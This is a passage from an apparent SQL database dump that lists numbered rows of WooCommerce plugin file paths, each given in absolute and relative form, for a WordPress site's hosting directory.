c-coupon.php'),(7557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-customer-download-log.php','wp-content/plugins/woocommerce/includes/class-wc-customer-download-log.php'),(7558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-customer-download.php','wp-content/plugins/woocommerce/includes/class-wc-customer-download.php'),(7559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-customer.php','wp-content/plugins/woocommerce/includes/class-wc-customer.php'),(7560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-data-exception.php','wp-content/plugins/woocommerce/includes/class-wc-data-exception.php'),(7561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-data-store.php','wp-content/plugins/woocommerce/includes/class-wc-data-store.php'),(7562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-datetime.php','wp-content/plugins/woocommerce/includes/class-wc-datetime.php'),(7563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-deprecated-action-hooks.php','wp-content/plugins/woocommerce/includes/class-wc-deprecated-action-hooks.php'),(7564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-deprecated-filter-hooks.php','wp-content/plugins/woocommerce/includes/class-wc-deprecated-filter-hooks.php'),(7565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-discounts.php','wp-content/plugins/woocommerce/includes/class-wc-discounts.php'),(7566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-download-handler.php','wp-content/plugins/woocommerce/includes/class-wc-download-handler.php'),(7567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-emails.php','wp-content/plugins/woocommerce/includes/class-wc-emails.php'),(7568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-embed.php','wp-content/plugins/woocommerce/includes/class-wc-embed.php'),(7569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-form-handler.php','wp-content/plugins/woocommerce/includes/class-wc-form-handler.php'),(7570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-frontend-scripts.php','wp-content/plugins/woocommerce/includes/class-wc-frontend-scripts.php'),(7571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-geo-ip.php','wp-content/plugins/woocommerce/includes/class-wc-geo-ip.php'),(7572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-geolite-integration.php','wp-content/plugins/woocommerce/includes/class-wc-geolite-integration.php'),(7573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-geolocation.php','wp-content/plugins/woocommerce/includes/class-wc-geolocation.php'),(7574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-https.php','wp-content/plugins/woocommerce/includes/class-wc-https.php'),(7575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-install.php','wp-content/plugins/woocommerce/includes/class-wc-install.php'),(7576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-integrations.php','wp-content/plugins/woocommerce/includes/class-wc-integrations.php'),(7577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-log-levels.php','wp-content/plugins/woocommerce/includes/class-wc-log-levels.php'),(7578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-logger.php','wp-content/plugins/woocommerce/includes/class-wc-logger.php'),(7579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-meta-data.php','wp-content/plugins/woocommerce/includes/class-wc-meta-data.php'),(7580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-factory.php','wp-content/plugins/woocommerce/includes/class-wc-order-factory.php'),(7581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-item-coupon.php','wp-content/plugins/woocommerce/includes/class-wc-order-item-coupon.php'),(7582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-item-fee.php','wp-content/plugins/woocommerce/includes/class-wc-order-item-fee.php'),(7583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-item-meta.php','wp-content/plugins/woocommerce/includes/class-wc-order-item-meta.php'),(7584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-item-product.php','wp-content/plugins/woocommerce/includes/class-wc-order-item-product.php'),(7585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-item-shipping.php','wp-content/plugins/woocommerce/includes/class-wc-order-item-shipping.php'),(7586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-item-tax.php','wp-content/plugins/woocommerce/includes/class-wc-order-item-tax.php'),(7587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-item.php','wp-content/plugins/woocommerce/includes/class-wc-order-item.php'),(7588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-query.php','wp-content/plugins/woocommerce/includes/class-wc-order-query.php'),(7589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order-refund.php','wp-content/plugins/woocommerce/includes/class-wc-order-refund.php'),(7590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-order.php','wp-content/plugins/woocommerce/includes/class-wc-order.php'),(7591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-payment-gateways.php','wp-content/plugins/woocommerce/includes/class-wc-payment-gateways.php'),(7592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-payment-tokens.php','wp-content/plugins/woocommerce/includes/class-wc-payment-tokens.php'),(7593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-post-data.php','wp-content/plugins/woocommerce/includes/class-wc-post-data.php'),(7594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-post-types.php','wp-content/plugins/woocommerce/includes/class-wc-post-types.php'),(7595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-privacy-background-process.php','wp-content/plugins/woocommerce/includes/class-wc-privacy-background-process.php'),(7596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-privacy-erasers.php','wp-content/plugins/woocommerce/includes/class-wc-privacy-erasers.php'),(7597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-privacy-exporters.php','wp-content/plugins/woocommerce/includes/class-wc-privacy-exporters.php'),(7598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-privacy.php','wp-content/plugins/woocommerce/includes/class-wc-privacy.php'),(7599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-attribute.php','wp-content/plugins/woocommerce/includes/class-wc-product-attribute.php'),(7600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-download.php','wp-content/plugins/woocommerce/includes/class-wc-product-download.php'),(7601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-external.php','wp-content/plugins/woocommerce/includes/class-wc-product-external.php'),(7602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-factory.php','wp-content/plugins/woocommerce/includes/class-wc-product-factory.php'),(7603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-grouped.php','wp-content/plugins/woocommerce/includes/class-wc-product-grouped.php'),(7604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-query.php','wp-content/plugins/woocommerce/includes/class-wc-product-query.php'),(7605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-simple.php','wp-content/plugins/woocommerce/includes/class-wc-product-simple.php'),(7606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-variable.php','wp-content/plugins/woocommerce/includes/class-wc-product-variable.php'),(7607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-product-variation.php','wp-content/plugins/woocommerce/includes/class-wc-product-variation.php'),(7608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-query.php','wp-content/plugins/woocommerce/includes/class-wc-query.php'),(7609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-rate-limiter.php','wp-content/plugins/woocommerce/includes/class-wc-rate-limiter.php'),(7610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-regenerate-images-request.php','wp-content/plugins/woocommerce/includes/class-wc-regenerate-images-request.php'),(7611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-regenerate-images.php','wp-content/plugins/woocommerce/includes/class-wc-regenerate-images.php'),(7612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-register-wp-admin-settings.php','wp-content/plugins/woocommerce/includes/class-wc-register-wp-admin-settings.php'),(7613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-rest-authentication.php','wp-content/plugins/woocommerce/includes/class-wc-rest-authentication.php'),(7614,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-rest-exception.php','wp-content/plugins/woocommerce/includes/class-wc-rest-exception.php'),(7615,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-session-handler.php','wp-content/plugins/woocommerce/includes/class-wc-session-handler.php'),(7616,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-shipping-rate.php','wp-content/plugins/woocommerce/includes/class-wc-shipping-rate.php'),(7617,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-shipping-zone.php','wp-content/plugins/woocommerce/includes/class-wc-shipping-zone.php'),(7618,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-shipping-zones.php','wp-content/plugins/woocommerce/includes/class-wc-shipping-zones.php'),(7619,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-shipping.php','wp-content/plugins/woocommerce/includes/class-wc-shipping.php'),(7620,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-shortcodes.php','wp-content/plugins/woocommerce/includes/class-wc-shortcodes.php'),(7621,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-structured-data.php','wp-content/plugins/woocommerce/includes/class-wc-structured-data.php'),(7622,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-tax.php','wp-content/plugins/woocommerce/includes/class-wc-tax.php'),(7623,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-template-loader.php','wp-content/plugins/woocommerce/includes/class-wc-template-loader.php'),(7624,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-tracker.php','wp-content/plugins/woocommerce/includes/class-wc-tracker.php'),(7625,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-validation.php','wp-content/plugins/woocommerce/includes/class-wc-validation.php'),(7626,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-webhook.php','wp-content/plugins/woocommerce/includes/class-wc-webhook.php'),(7627,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-woocommerce.php','wp-content/plugins/woocommerce/includes/class-woocommerce.php'),(7628,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/cli/class-wc-cli-com-command.php','wp-content/plugins/woocommerce/includes/cli/class-wc-cli-com-command.php'),(7629,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/cli/class-wc-cli-com-extension-command.php','wp-content/plugins/woocommerce/includes/cli/class-wc-cli-com-extension-command.php'),(7630,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/cli/class-wc-cli-rest-command.php','wp-content/plugins/woocommerce/includes/cli/class-wc-cli-rest-command.php'),(7631,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/cli/class-wc-cli-runner.php','wp-content/plugins/woocommerce/includes/cli/class-wc-cli-runner.php'),(7632,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/cli/class-wc-cli-tool-command.php','wp-content/plugins/woocommerce/includes/cli/class-wc-cli-tool-command.php'),(7633,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/cli/class-wc-cli-tracker-command.php','wp-content/plugins/woocommerce/includes/cli/class-wc-cli-tracker-command.php'),(7634,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/cli/class-wc-cli-update-command.php','wp-content/plugins/woocommerce/includes/cli/class-wc-cli-update-command.php'),(7635,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/customizer/class-wc-customizer-control-cropping.php','wp-content/plugins/woocommerce/includes/customizer/class-wc-customizer-control-cropping.php'),(7636,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/customizer/class-wc-shop-customizer.php','wp-content/plugins/woocommerce/includes/customizer/class-wc-shop-customizer.php'),(7637,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/abstract-wc-order-data-store-cpt.php','wp-content/plugins/woocommerce/includes/data-stores/abstract-wc-order-data-store-cpt.php'),(7638,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/abstract-wc-order-item-type-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/abstract-wc-order-item-type-data-store.php'),(7639,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-coupon-data-store-cpt.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-coupon-data-store-cpt.php'),(7640,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-data-store-session.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-data-store-session.php'),(7641,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-data-store.php'),(7642,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-download-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-download-data-store.php'),(7643,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-download-log-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-download-log-data-store.php'),(7644,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-data-store-wp.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-data-store-wp.php'),(7645,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-data-store-cpt.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-data-store-cpt.php'),(7646,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-coupon-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-coupon-data-store.php'),(7647,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-data-store.php'),(7648,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-fee-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-fee-data-store.php'),(7649,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-product-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-product-data-store.php'),(7650,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-shipping-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-shipping-data-store.php'),(7651,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-tax-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-tax-data-store.php'),(7652,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-refund-data-store-cpt.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-refund-data-store-cpt.php'),(7653,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-payment-token-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-payment-token-data-store.php'),(7654,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-data-store-cpt.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-data-store-cpt.php'),(7655,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-grouped-data-store-cpt.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-grouped-data-store-cpt.php'),(7656,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-variable-data-store-cpt.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-variable-data-store-cpt.php'),(7657,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-variation-data-store-cpt.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-variation-data-store-cpt.php'),(7658,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-shipping-zone-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-shipping-zone-data-store.php'),(7659,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/data-stores/class-wc-webhook-data-store.php','wp-content/plugins/woocommerce/includes/data-stores/class-wc-webhook-data-store.php'),(7660,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-cancelled-order.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-cancelled-order.php'),(7661,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-completed-order.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-completed-order.php'),(7662,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-invoice.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-invoice.php'),(7663,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-new-account.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-new-account.php'),(7664,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-note.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-note.php'),(7665,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-on-hold-order.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-on-hold-order.php'),(7666,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-processing-order.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-processing-order.php'),(7667,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-refunded-order.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-refunded-order.php'),(7668,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-reset-password.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-reset-password.php'),(7669,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-failed-order.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-failed-order.php'),(7670,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email-new-order.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email-new-order.php'),(7671,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/emails/class-wc-email.php','wp-content/plugins/woocommerce/includes/emails/class-wc-email.php'),(7672,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/export/abstract-wc-csv-batch-exporter.php','wp-content/plugins/woocommerce/includes/export/abstract-wc-csv-batch-exporter.php'),(7673,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/export/abstract-wc-csv-exporter.php','wp-content/plugins/woocommerce/includes/export/abstract-wc-csv-exporter.php'),(7674,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/export/class-wc-product-csv-exporter.php','wp-content/plugins/woocommerce/includes/export/class-wc-product-csv-exporter.php'),(7675,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/bacs/class-wc-gateway-bacs.php','wp-content/plugins/woocommerce/includes/gateways/bacs/class-wc-gateway-bacs.php'),(7676,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/cheque/class-wc-gateway-cheque.php','wp-content/plugins/woocommerce/includes/gateways/cheque/class-wc-gateway-cheque.php'),(7677,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/class-wc-payment-gateway-cc.php','wp-content/plugins/woocommerce/includes/gateways/class-wc-payment-gateway-cc.php'),(7678,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/class-wc-payment-gateway-echeck.php','wp-content/plugins/woocommerce/includes/gateways/class-wc-payment-gateway-echeck.php'),(7679,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/cod/class-wc-gateway-cod.php','wp-content/plugins/woocommerce/includes/gateways/cod/class-wc-gateway-cod.php'),(7680,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/assets/images/paypal.png','wp-content/plugins/woocommerce/includes/gateways/paypal/assets/images/paypal.png'),(7681,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/assets/js/paypal-admin.js','wp-content/plugins/woocommerce/includes/gateways/paypal/assets/js/paypal-admin.js'),(7682,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/assets/js/paypal-admin.min.js','wp-content/plugins/woocommerce/includes/gateways/paypal/assets/js/paypal-admin.min.js'),(7683,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/class-wc-gateway-paypal.php','wp-content/plugins/woocommerce/includes/gateways/paypal/class-wc-gateway-paypal.php'),(7684,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-api-handler.php','wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-api-handler.php'),(7685,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-ipn-handler.php','wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-ipn-handler.php'),(7686,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-pdt-handler.php','wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-pdt-handler.php'),(7687,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-request.php','wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-request.php'),(7688,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-response.php','wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-response.php'),(7689,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/gateways/paypal/includes/settings-paypal.php','wp-content/plugins/woocommerce/includes/gateways/paypal/includes/settings-paypal.php'),(7690,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/import/abstract-wc-product-importer.php','wp-content/plugins/woocommerce/includes/import/abstract-wc-product-importer.php'),(7691,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/import/class-wc-product-csv-importer.php','wp-content/plugins/woocommerce/includes/import/class-wc-product-csv-importer.php'),(7692,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/integrations/maxmind-geolocation/class-wc-integration-maxmind-database-service.php','wp-content/plugins/woocommerce/includes/integrations/maxmind-geolocation/class-wc-integration-maxmind-database-service.php'),(7693,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/integrations/maxmind-geolocation/class-wc-integration-maxmind-geolocation.php','wp-content/plugins/woocommerce/includes/integrations/maxmind-geolocation/class-wc-integration-maxmind-geolocation.php'),(7694,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/integrations/maxmind-geolocation/views/html-admin-options.php','wp-content/plugins/woocommerce/includes/integrations/maxmind-geolocation/views/html-admin-options.php'),(7695,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-abstract-order-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-abstract-order-data-store-interface.php'),(7696,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-coupon-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-coupon-data-store-interface.php'),(7697,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-data-store-interface.php'),(7698,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-download-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-download-data-store-interface.php'),(7699,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-download-log-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-download-log-data-store-interface.php'),(7700,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-importer-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-importer-interface.php'),(7701,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-log-handler-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-log-handler-interface.php'),(7702,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-logger-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-logger-interface.php'),(7703,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-object-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-object-data-store-interface.php'),(7704,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-data-store-interface.php'),(7705,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-data-store-interface.php'),(7706,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-product-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-product-data-store-interface.php'),(7707,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-type-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-type-data-store-interface.php'),(7708,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-refund-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-refund-data-store-interface.php'),(7709,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-payment-token-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-payment-token-data-store-interface.php'),(7710,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-product-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-product-data-store-interface.php'),(7711,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-product-variable-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-product-variable-data-store-interface.php'),(7712,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-queue-interface.php','wp-content/plugins/woocommerce/includes/interfaces